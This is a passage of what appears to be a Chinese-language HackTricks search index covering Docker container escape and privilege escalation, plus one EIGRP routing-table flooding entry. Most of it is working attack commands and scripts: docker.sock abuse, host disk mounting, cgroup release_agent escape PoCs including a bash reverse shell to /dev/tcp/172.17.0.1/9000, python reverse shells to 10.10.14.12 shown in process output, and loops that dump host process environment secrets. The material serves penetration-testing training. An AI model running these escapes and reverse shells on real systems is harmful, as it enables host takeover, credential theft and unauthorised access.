Security » Docker --privileged » 命名空间","id":"1623","title":"命名空间"},"1624":{"body":"默认情况下,容器引擎不使用用户命名空间,除了无根容器 ,无根容器需要它们进行文件系统挂载和使用多个 UID。用户命名空间对于无根容器至关重要,无法禁用,并通过限制特权显著增强安全性。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 用户命名空间","id":"1624","title":"用户命名空间"},"1625":{"body":"https://www.redhat.com/sysadmin/privileged-flag-container-engines tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker --privileged » 参考","id":"1625","title":"参考"},"1626":{"body":"Reading time: 25 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker Breakout / Privilege Escalation","id":"1626","title":"Docker Breakout / Privilege Escalation"},"1627":{"body":"linpeas : 它也可以 枚举容器 CDK : 这个工具对于枚举你所在的容器非常 有用,甚至可以尝试自动逃逸 amicontained : 有用的工具,用于获取容器的权限,以便找到逃逸的方法 deepce : 用于枚举和逃逸容器的工具 grype : 获取镜像中安装的软件所包含的 CVE","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 自动枚举与逃逸","id":"1627","title":"自动枚举与逃逸"},"1628":{"body":"如果你发现 docker 套接字被挂载 在 docker 容器内,你将能够从中逃逸。 这通常发生在某些需要连接到 docker 守护进程以执行操作的 docker 容器中。 bash #Search the socket\\nfind / -name docker.sock 2>/dev/null\\n#It\'s usually in /run/docker.sock 在这种情况下,您可以使用常规的 docker 命令与 docker 守护进程进行通信: bash #List images to use one\\ndocker images\\n#Run the image mounting the host disk and chroot on it\\ndocker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash # Get full access to the host via ns pid and nsenter cli\\ndocker run -it --rm --pid=host --privileged ubuntu bash\\nnsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged\\ndocker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash tip 如果 docker socket在意外的位置 ,您仍然可以使用带有参数**-H unix:///path/to/docker.sock 的 docker**命令与其通信。 Docker守护进程也可能在一个端口上 监听(默认2375, 2376) ,或者在基于Systemd的系统上,可以通过Systemd socket fd://与Docker守护进程进行通信。 tip 此外,请注意其他高级运行时的运行时socket: dockershim: unix:///var/run/dockershim.sock containerd: unix:///run/containerd/containerd.sock cri-o: unix:///var/run/crio/crio.sock frakti: unix:///var/run/frakti.sock rktlet: unix:///var/run/rktlet.sock ...","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 挂载的 Docker 套接字逃逸","id":"1628","title":"挂载的 Docker 套接字逃逸"},"1629":{"body":"您应该检查容器的能力,如果它具有以下任何一种,您可能能够逃离它: CAP_SYS_ADMIN 、 CAP_SYS_PTRACE 、 CAP_SYS_MODULE 、 DAC_READ_SEARCH 、 DAC_OVERRIDE、CAP_SYS_RAWIO、CAP_SYSLOG、CAP_NET_RAW、CAP_NET_ADMIN 您可以使用 之前提到的自动工具 或: bash capsh --print 在以下页面中,您可以 了解更多关于 Linux 能力 的信息,以及如何滥用它们以逃逸/提升权限: Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 能力滥用逃逸","id":"1629","title":"能力滥用逃逸"},"163":{"body":"目标 :通过向路由表中填充大量虚假路由来加重路由器的CPU和RAM负担。 工具 : routingtableoverflow.py 脚本。 执行 : %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%% 参数 : --interface:指定网络接口。 --as:定义EIGRP AS编号。 --src:设置攻击者的IP地址。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 路由表溢出攻击","id":"163","title":"路由表溢出攻击"},"1630":{"body":"可以使用 --privileged 标志或禁用特定防御来创建特权容器: --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host Mount /dev --privileged 标志显著降低了容器安全性,提供 无限制的设备访问 并绕过 多个保护措施 。有关详细信息,请参阅 --privileged 的完整影响文档。 Docker --privileged","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 从特权容器逃逸","id":"1630","title":"从特权容器逃逸"},"1631":{"body":"拥有这些权限后,您可以 像 init(pid:1)一样,直接移动到主机上以 root 身份运行的进程的命名空间 ,只需运行:nsenter --target 1 --mount --uts --ipc --net --pid -- bash 在容器中执行测试: bash docker run --rm -it --pid=host --privileged ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 特权 + hostPID","id":"1631","title":"特权 + hostPID"},"1632":{"body":"仅凭特权标志,您可以尝试 访问主机的磁盘 或尝试 通过滥用 release_agent 或其他逃逸进行逃逸 。 在容器中执行以下绕过测试: bash docker run --rm -it --privileged ubuntu bash 挂载磁盘 - Poc1 配置良好的 docker 容器不会允许像 fdisk -l 这样的命令。然而,在错误配置的 docker 命令中,如果指定了标志 --privileged 或 --device=/dev/sda1(带大写),则可以获得查看主机驱动器的权限。 因此,要接管主机机器,这很简单: bash mkdir -p /mnt/hola\\nmount /dev/sda1 /mnt/hola 而且,瞧!您现在可以访问主机的文件系统,因为它已挂载在 /mnt/hola 文件夹中。 挂载磁盘 - Poc2 在容器内,攻击者可能会尝试通过集群创建的可写 hostPath 卷进一步访问底层主机操作系统。以下是您可以在容器内检查的一些常见事项,以查看您是否可以利用此攻击者向量: bash ### Check if You Can Write to a File-system\\necho 1 > /proc/sysrq-trigger ### Check root UUID\\ncat /proc/cmdline\\nBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300 # Check Underlying Host Filesystem\\nfindfs UUID=\\n/dev/sda1 # Attempt to Mount the Host\'s Filesystem\\nmkdir /mnt-test\\nmount /dev/sda1 /mnt-test\\nmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now. ### debugfs (Interactive File System Debugger)\\ndebugfs /dev/sda1 特权逃逸 利用现有的 release_agent ( cve-2022-0492 ) - PoC1 Initial PoC # spawn a new container to exploit via:\\n# docker run --rm -it --privileged ubuntu bash # Finds + enables a cgroup release_agent\\n# Looks for something like: /sys/fs/cgroup/*/release_agent\\nd=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`\\n# If \\"d\\" is empty, this won\'t work, you need to use the next PoC # Enables notify_on_release in the cgroup\\nmkdir -p $d/w;\\necho 1 >$d/w/notify_on_release\\n# If you have a \\"Read-only file system\\" error, you need to use the next PoC # Finds path of OverlayFS mount for container\\n# Unless the configuration explicitly exposes the mount point of the host filesystem\\n# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html\\nt=`sed -n \'s/overlay \\\\/ .*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab` # Sets release_agent to /path/payload\\ntouch /o; echo $t/c > $d/release_agent # Creates a payload\\necho \\"#!/bin/sh\\" > /c\\necho \\"ps > $t/o\\" >> /c\\nchmod +x /c # Triggers the cgroup via empty cgroup.procs\\nsh -c \\"echo 0 > $d/w/cgroup.procs\\"; sleep 1 # Reads the output\\ncat /o 特权逃逸 利用创建的 release_agent ( cve-2022-0492 ) - PoC2 Second PoC # On the host\\ndocker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash # Mounts the RDMA cgroup controller and create a child cgroup\\n# This technique should work with the majority of cgroup controllers\\n# If you\'re following along and get \\"mount: /tmp/cgrp: special device cgroup does not exist\\"\\n# It\'s because your setup doesn\'t have the RDMA cgroup controller, try change rdma to memory to fix it\\nmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x\\n# If mount gives an error, this won\'t work, you need to use the first PoC # Enables cgroup notifications on release of the \\"x\\" cgroup\\necho 1 > /tmp/cgrp/x/notify_on_release # Finds path of OverlayFS mount for container\\n# Unless the configuration explicitly exposes the mount point of the host filesystem\\n# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html\\nhost_path=`sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab` # Sets release_agent to /path/payload\\necho \\"$host_path/cmd\\" > /tmp/cgrp/release_agent #For a normal PoC =================\\necho \'#!/bin/sh\' > /cmd\\necho \\"ps aux > $host_path/output\\" >> /cmd\\nchmod a+x /cmd\\n#===================================\\n#Reverse shell\\necho \'#!/bin/bash\' > /cmd\\necho \\"bash -i >& /dev/tcp/172.17.0.1/9000 0>&1\\" >> /cmd\\nchmod a+x /cmd\\n#=================================== # Executes the attack by spawning a process that immediately ends inside the \\"x\\" child cgroup\\n# By creating a /bin/sh process and writing its PID to the cgroup.procs file in \\"x\\" child cgroup directory\\n# The script on the host will execute after /bin/sh exits\\nsh -c \\"echo \\\\$\\\\$ > /tmp/cgrp/x/cgroup.procs\\" # Reads the output\\ncat /output 找到 技术的解释 在: Docker release_agent cgroups escape 特权逃逸 利用 release_agent 而不知道相对路径 - PoC3 在之前的漏洞中, 容器在主机文件系统中的绝对路径被泄露 。然而,这并不总是如此。在你 不知道容器在主机中的绝对路径 的情况下,你可以使用这个技术: release_agent exploit - Relative Paths to PIDs bash #!/bin/sh OUTPUT_DIR=\\"/\\"\\nMAX_PID=65535\\nCGROUP_NAME=\\"xyx\\"\\nCGROUP_MOUNT=\\"/tmp/cgrp\\"\\nPAYLOAD_NAME=\\"${CGROUP_NAME}_payload.sh\\"\\nPAYLOAD_PATH=\\"${OUTPUT_DIR}/${PAYLOAD_NAME}\\"\\nOUTPUT_NAME=\\"${CGROUP_NAME}_payload.out\\"\\nOUTPUT_PATH=\\"${OUTPUT_DIR}/${OUTPUT_NAME}\\" # Run a process for which we can search for (not needed in reality, but nice to have)\\nsleep 10000 & # Prepare the payload script to execute on the host\\ncat > ${PAYLOAD_PATH} << __EOF__\\n#!/bin/sh OUTPATH=\\\\$(dirname \\\\$0)/${OUTPUT_NAME} # Commands to run on the host<\\nps -eaf > \\\\${OUTPATH} 2>&1\\n__EOF__ # Make the payload script executable\\nchmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller\\nmkdir ${CGROUP_MOUNT}\\nmount -t cgroup -o memory cgroup ${CGROUP_MOUNT}\\nmkdir ${CGROUP_MOUNT}/${CGROUP_NAME}\\necho 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses\\nTPID=1\\nwhile [ ! -f ${OUTPUT_PATH} ]\\ndo\\nif [ $((${TPID} % 100)) -eq 0 ]\\nthen\\necho \\"Checking pid ${TPID}\\"\\nif [ ${TPID} -gt ${MAX_PID} ]\\nthen\\necho \\"Exiting at ${MAX_PID} :-(\\"\\nexit 1\\nfi\\nfi\\n# Set the release_agent path to the guessed pid\\necho \\"/proc/${TPID}/root${PAYLOAD_PATH}\\" > ${CGROUP_MOUNT}/release_agent\\n# Trigger execution of the release_agent\\nsh -c \\"echo \\\\$\\\\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs\\"\\nTPID=$((${TPID} + 1))\\ndone # Wait for and cat the output\\nsleep 1\\necho \\"Done! Output:\\"\\ncat ${OUTPUT_PATH} 在特权容器中执行 PoC 应该会提供类似于以下的输出: bash root@container:~$ ./release_agent_pid_brute.sh\\nChecking pid 100\\nChecking pid 200\\nChecking pid 300\\nChecking pid 400\\nChecking pid 500\\nChecking pid 600\\nChecking pid 700\\nChecking pid 800\\nChecking pid 900\\nChecking pid 1000\\nChecking pid 1100\\nChecking pid 1200 Done! Output:\\nUID PID PPID C STIME TTY TIME CMD\\nroot 1 0 0 11:25 ? 00:00:01 /sbin/init\\nroot 2 0 0 11:25 ? 00:00:00 [kthreadd]\\nroot 3 2 0 11:25 ? 00:00:00 [rcu_gp]\\nroot 4 2 0 11:25 ? 00:00:00 [rcu_par_gp]\\nroot 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events]\\nroot 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd]\\nroot 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq]\\nroot 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]\\n... 特权逃逸滥用敏感挂载 有几个文件可能被挂载,这些文件提供了 关于底层主机的信息 。其中一些甚至可能指示 当发生某些事情时由主机执行的内容 (这将允许攻击者逃离容器)。 滥用这些文件可能允许: release_agent(之前已经讨论过) binfmt_misc core_pattern uevent_helper modprobe 然而,您可以在此页面找到 其他敏感文件 进行检查: Sensitive Mounts","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Privileged","id":"1632","title":"Privileged"},"1633":{"body":"在多个场合,您会发现 容器从主机挂载了一些卷 。如果这个卷没有正确配置,您可能能够 访问/修改敏感数据 :读取秘密,修改ssh authorized_keys… bash docker run --rm -it -v /:/host ubuntu bash 另一个有趣的例子可以在 这个博客 中找到,其中指出主机的 /usr/bin/ 和 /bin/ 文件夹被挂载在容器内,允许容器的 root 用户修改这些文件夹中的二进制文件。因此,如果 cron 作业使用了那里的任何二进制文件,例如 /etc/cron.d/popularity-contest,这允许通过修改 cron 作业使用的二进制文件来逃离容器。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 任意挂载","id":"1633","title":"任意挂载"},"1634":{"body":"如果您作为 root 访问容器 ,并且该容器挂载了主机的某个文件夹,并且您已经 作为非特权用户逃离到主机 并对挂载的文件夹具有读取权限。 您可以在 容器 内的 挂载文件夹 中创建一个 bash suid 文件 ,并 从主机执行它 以进行特权提升。 bash cp /bin/bash . #From non priv inside mounted folder\\n# You need to copy it from the host as the bash binaries might be diferent in the host and in the container\\nchown root:root bash #From container as root inside mounted folder\\nchmod 4777 bash #From container as root inside mounted folder\\nbash -p #From non priv inside mounted folder","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 使用 2 个 shell 和主机挂载进行特权提升","id":"1634","title":"使用 2 个 shell 和主机挂载进行特权提升"},"1635":{"body":"如果您在 容器内以 root 身份访问 ,并且您已经 以非特权用户身份逃逸到主机 ,您可以利用这两个 shell 来 在主机内进行特权升级 ,前提是您在容器内具有 MKNOD 能力(默认情况下是这样的),正如 在这篇文章中解释的 。 拥有这样的能力,容器内的 root 用户被允许 创建块设备文件 。设备文件是用于 访问底层硬件和内核模块 的特殊文件。例如,/dev/sda 块设备文件提供了 读取系统磁盘上的原始数据 的访问权限。 Docker 通过强制执行 cgroup 策略来防止容器内块设备的滥用,该策略 阻止块设备的读/写操作 。然而,如果在容器内 创建了块设备 ,则可以通过 /proc/PID/root/ 目录从容器外部访问它。此访问要求 进程所有者在容器内外相同 。 利用 示例来自这篇 写作 : bash # On the container as root\\ncd /\\n# Crate device\\nmknod sda b 8 0\\n# Give access to it\\nchmod 777 sda # Create the nonepriv user of the host inside the container\\n## In this case it\'s called augustus (like the user from the host)\\necho \\"augustus:x:1000:1000:augustus,,,:/home/augustus:/bin/bash\\" >> /etc/passwd\\n# Get a shell as augustus inside the container\\nsu augustus\\nsu: Authentication failure\\n(Ignored)\\naugustus@3a453ab39d3d:/backend$ /bin/sh\\n/bin/sh\\n$ bash # On the host # get the real PID of the shell inside the container as the new https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/~/changes/3847/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privilege-escalation-with-2-shells user\\naugustus@GoodGames:~$ ps -auxf | grep /bin/sh\\nroot 1496 0.0 0.0 4292 744 ? S 09:30 0:00 \\\\_ /bin/sh -c python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.12\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"sh\\")\'\\nroot 1627 0.0 0.0 4292 756 ? S 09:44 0:00 \\\\_ /bin/sh -c python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.12\\",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"sh\\")\'\\naugustus 1659 0.0 0.0 4292 712 ? S+ 09:48 0:00 \\\\_ /bin/sh\\naugustus 1661 0.0 0.0 6116 648 pts/0 S+ 09:48 0:00 \\\\_ grep /bin/sh # The process ID is 1659 in this case\\n# Grep for the sda for HTB{ through the process:\\naugustus@GoodGames:~$ grep -a \'HTB{\' /proc/1659/root/sda\\nHTB{7h4T_w45_Tr1cKy_1_D4r3_54y}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Privilege Escalation with 2 shells","id":"1635","title":"Privilege Escalation with 2 shells"},"1636":{"body":"如果您可以访问主机的进程,您将能够访问存储在这些进程中的大量敏感信息。运行测试实验室: docker run --rm -it --pid=host ubuntu bash 例如,您将能够使用类似 ps auxn 的命令列出进程,并在命令中搜索敏感细节。 然后,您可以 访问 /proc/ 中主机的每个进程,您可以通过运行来窃取它们的环境秘密 : bash for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done\\n/proc/988058/environ\\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\\nHOSTNAME=argocd-server-69678b4f65-6mmql\\nUSER=abrgocd\\n... 您还可以 访问其他进程的文件描述符并读取它们打开的文件 : bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \\\\>; done > fds.txt\\nless fds.txt\\n...omitted for brevity...\\nlrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/2 -> /dev/pts/0\\nlrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp\\n# You can open the secret filw with:\\ncat /proc/635813/fd/4 您还可以 终止进程并导致 DoS 。 warning 如果您以某种方式拥有 对容器外部进程的特权访问权限 ,您可以运行类似 nsenter --target --all 或 nsenter --target --mount --net --pid --cgroup 的命令,以 在与该进程相同的 ns 限制 (希望没有)下 运行一个 shell 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostPID","id":"1636","title":"hostPID"},"1637":{"body":"docker run --rm -it --network=host ubuntu bash 如果一个容器配置了 Docker host networking driver (--network=host) ,那么该容器的网络栈就不会与 Docker 主机隔离(容器共享主机的网络命名空间),并且容器不会分配自己的 IP 地址。换句话说, 容器将所有服务直接绑定到主机的 IP 。此外,容器可以 拦截主机在共享接口上发送和接收的所有网络流量 tcpdump -i eth0。 例如,您可以使用此方法 嗅探甚至伪造主机与元数据实例之间的流量 。 如以下示例所示: Writeup: How to contact Google SRE: Dropping a shell in cloud SQL Metadata service MITM allows root privilege escalation (EKS / GKE) 您还将能够访问 绑定到 localhost 的网络服务 ,或者甚至访问 节点的元数据权限 (这可能与容器可以访问的权限不同)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostNetwork","id":"1637","title":"hostNetwork"},"1638":{"body":"bash docker run --rm -it --ipc=host ubuntu bash 使用 hostIPC=true,您可以访问主机的进程间通信(IPC)资源,例如 /dev/shm 中的 共享内存 。这允许读取/写入其他主机或 pod 进程使用的相同 IPC 资源。使用 ipcs 进一步检查这些 IPC 机制。 检查 /dev/shm - 查找此共享内存位置中的任何文件: ls -la /dev/shm 检查现有的 IPC 设施 – 您可以检查是否正在使用任何 IPC 设施,使用 /usr/bin/ipcs。检查命令为: ipcs -a","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostIPC","id":"1638","title":"hostIPC"},"1639":{"body":"如果系统调用 unshare 没有被禁止,您可以通过运行来恢复所有能力: bash unshare -UrmCpf bash\\n# Check them with\\ncat /proc/self/status | grep CapEff","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 恢复能力","id":"1639","title":"恢复能力"},"164":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP & HSRP Attacks","id":"164","title":"GLBP & HSRP Attacks"},"1640":{"body":"帖子中解释的第二种技术 https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/ 指出如何利用用户命名空间滥用绑定挂载,以影响主机内部的文件(在特定情况下,删除文件)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 用户命名空间滥用通过符号链接","id":"1640","title":"用户命名空间滥用通过符号链接"},"1641":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » CVEs","id":"1641","title":"CVEs"},"1642":{"body":"如果您可以以 root 身份执行 docker exec(可能使用 sudo),您可以尝试通过利用 CVE-2019-5736 来提升权限(漏洞 在这里 )。该技术基本上将 主机 的 /bin/sh 二进制文件 从容器中 覆盖 ,因此任何执行 docker exec 的人都可能触发有效载荷。 相应地更改有效载荷,并使用 go build main.go 构建 main.go。生成的二进制文件应放置在 docker 容器中以供执行。 执行时,一旦显示 [+] Overwritten /bin/sh successfully,您需要从主机机器执行以下命令: docker exec -it /bin/sh 这将触发 main.go 文件中存在的有效载荷。 更多信息: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html tip 容器可能还会受到其他 CVE 的影响,您可以在 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list 找到列表","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Runc 漏洞 (CVE-2019-5736)","id":"1642","title":"Runc 漏洞 (CVE-2019-5736)"},"1643":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker 自定义逃逸","id":"1643","title":"Docker 自定义逃逸"},"1644":{"body":"命名空间: 进程应该通过命名空间与其他进程 完全隔离 ,因此我们无法通过命名空间与其他进程交互(默认情况下无法通过 IPC、unix 套接字、网络服务、D-Bus、其他进程的 /proc 进行通信)。 根用户 :默认情况下,运行进程的用户是根用户(但其权限是有限的)。 能力 :Docker 保留以下能力: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep 系统调用 :这些是 根用户无法调用 的系统调用(因为缺乏能力 + Seccomp)。其他系统调用可以用来尝试逃逸。 {{#tab name=\\"x64 syscalls\\"}}\\nyaml 0x067 -- syslog\\n0x070 -- setsid\\n0x09b -- pivot_root\\n0x0a3 -- acct\\n0x0a4 -- settimeofday\\n0x0a7 -- swapon\\n0x0a8 -- swapoff\\n0x0aa -- sethostname\\n0x0ab -- setdomainname\\n0x0af -- init_module\\n0x0b0 -- delete_module\\n0x0d4 -- lookup_dcookie\\n0x0f6 -- kexec_load\\n0x12c -- fanotify_init\\n0x130 -- open_by_handle_at\\n0x139 -- finit_module\\n0x140 -- kexec_file_load\\n0x141 -- bpf {{#endtab}} {{#tab name=\\"arm64 syscalls\\"}} 0x029 -- pivot_root\\n0x059 -- acct\\n0x069 -- init_module\\n0x06a -- delete_module\\n0x074 -- syslog\\n0x09d -- setsid\\n0x0a1 -- sethostname\\n0x0a2 -- setdomainname\\n0x0aa -- settimeofday\\n0x0e0 -- swapon\\n0x0e1 -- swapoff\\n0x106 -- fanotify_init\\n0x109 -- open_by_handle_at\\n0x111 -- finit_module\\n0x118 -- bpf {{#endtab}} {{#tab name=\\"syscall_bf.c\\"}} `c // From a conversation I had with @arget131\\n// Fir bfing syscalss in x64 #include \\n#include \\n#include \\n#include int main()\\n{\\nfor(int i = 0; i < 333; ++i)\\n{\\nif(i == SYS_rt_sigreturn) continue;\\nif(i == SYS_select) continue;\\nif(i == SYS_pause) continue;\\nif(i == SYS_exit_group) continue;\\nif(i == SYS_exit) continue;\\nif(i == SYS_clone) continue;\\nif(i == SYS_fork) continue;\\nif(i == SYS_vfork) continue;\\nif(i == SYS_pselect6) continue;\\nif(i == SYS_ppoll) continue;\\nif(i == SYS_seccomp) continue;\\nif(i == SYS_vhangup) continue;\\nif(i == SYS_reboot) continue;\\nif(i == SYS_shutdown) continue;\\nif(i == SYS_msgrcv) continue;\\nprintf(\\"Probando: 0x%03x . . . \\", i); fflush(stdout);\\nif((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM))\\nprintf(\\"Error\\\\n\\");\\nelse\\nprintf(\\"OK\\\\n\\");\\n}\\n}\\n```","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker 逃逸表面","id":"1644","title":"Docker 逃逸表面"},"1645":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多详细信息,请 查看来自 https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html 的博客文章。这只是一个摘要: 该技术概述了一种 从容器内执行主机代码 的方法,克服了存储驱动程序配置带来的挑战,这些配置会模糊主机上的容器文件系统路径,例如 Kata Containers 或特定的 devicemapper 设置。 关键步骤: 定位进程 ID (PIDs): 使用 Linux 伪文件系统中的 /proc//root 符号链接,可以相对于主机的文件系统访问容器内的任何文件。这绕过了需要知道主机上容器文件系统路径的要求。 PID 碰撞: 采用暴力破解的方法搜索主机上的 PIDs。这是通过依次检查 /proc//root/ 中特定文件的存在来完成的。当找到该文件时,表明相应的 PID 属于在目标容器内运行的进程。 触发执行: 猜测的 PID 路径被写入 cgroups release_agent 文件。此操作触发 release_agent 的执行。通过检查输出文件的创建来确认此步骤的成功。 利用过程涉及一系列更详细的操作,旨在通过猜测在容器内运行的进程的正确 PID 来在主机上执行有效载荷。以下是其展开方式: 初始化环境: 在主机上准备一个有效载荷脚本 (payload.sh),并为 cgroup 操作创建一个唯一的目录。 准备有效载荷: 编写并使有效载荷脚本可执行,该脚本包含要在主机上执行的命令。 设置 Cgroup: 挂载并配置 cgroup。设置 notify_on_release 标志,以确保在释放 cgroup 时执行有效载荷。 暴力破解 PID: 循环遍历潜在的 PIDs,将每个猜测的 PID 写入 release_agent 文件。这有效地将有效载荷脚本设置为 release_agent。 触发并检查执行: 对于每个 PID,写入 cgroup 的 cgroup.procs,如果 PID 正确,则触发 release_agent 的执行。循环继续,直到找到有效载荷脚本的输出,表明执行成功。 来自博客文章的 PoC: bash #!/bin/sh OUTPUT_DIR=\\"/\\"\\nMAX_PID=65535\\nCGROUP_NAME=\\"xyx\\"\\nCGROUP_MOUNT=\\"/tmp/cgrp\\"\\nPAYLOAD_NAME=\\"${CGROUP_NAME}_payload.sh\\"\\nPAYLOAD_PATH=\\"${OUTPUT_DIR}/${PAYLOAD_NAME}\\"\\nOUTPUT_NAME=\\"${CGROUP_NAME}_payload.out\\"\\nOUTPUT_PATH=\\"${OUTPUT_DIR}/${OUTPUT_NAME}\\" # Run a process for which we can search for (not needed in reality, but nice to have)\\nsleep 10000 & # Prepare the payload script to execute on the host\\ncat > ${PAYLOAD_PATH} << __EOF__\\n#!/bin/sh OUTPATH=\\\\$(dirname 